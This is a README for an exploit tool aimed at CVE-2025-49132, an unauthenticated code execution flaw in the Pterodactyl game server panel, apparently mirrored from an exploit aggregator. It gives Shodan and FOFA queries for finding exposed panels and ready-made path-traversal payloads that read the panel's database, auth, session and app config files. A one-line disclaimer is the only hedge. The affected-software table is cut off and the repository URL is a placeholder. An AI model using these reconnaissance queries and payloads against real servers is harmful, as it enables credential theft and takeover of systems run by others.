Share
## https://sploitus.com/exploit?id=950472F4-2FF7-547C-BD31-B3326A944BE3
# CVE-2025-49132 โ€” Pterodactyl RCE

> Exploit tool for **CVE-2025-49132** โ€” a critical unauthenticated arbitrary code execution vulnerability affecting the **Pterodactyl** game server panel.

---

## ๐Ÿง  What is CVE-2025-49132 ?

A critical ACE flaw in the Pterodactyl panel that allows **unauthenticated remote attackers** to execute arbitrary code โ€” potentially leading to **full system compromise**.

No auth needed. Just a vulnerable instance.

---

## โš ๏ธ Disclaimer

For **educational and authorized pentesting purposes only.**  
---

## ๐Ÿ” Reconnaissance

**Shodan**
```
http.title:"Pterodactyl"
```

**FOFA**
```
"Pterodactyl"
```

---

## ๐Ÿ’‰ Payloads

```
locales/locale.json?locale=../../../pterodactyl&namespace=config/app
locales/locale.json?locale=../../../pterodactyl&namespace=config/database
locales/locale.json?locale=../../../pterodactyl&namespace=config/auth
locales/locale.json?locale=../../../pterodactyl&namespace=config/session
```

---

## ๐Ÿ“ฆ Installation

```bash
git clone https://github.com/yourname/CVE-2025-49132
cd CVE-2025-49132
pip install -r requirements.txt
```

---

## ๐ŸŽฏ Affected Software

| Software | Status |
|---|---|
| Pterodactyl Panel | 

---

## ๐Ÿ“„ References

- [NVD - CVE-2025-49132](https://nvd.nist.gov/vuln/detail/CVE-2025-49132)
- [Pterodactyl](https://pterodactyl.io)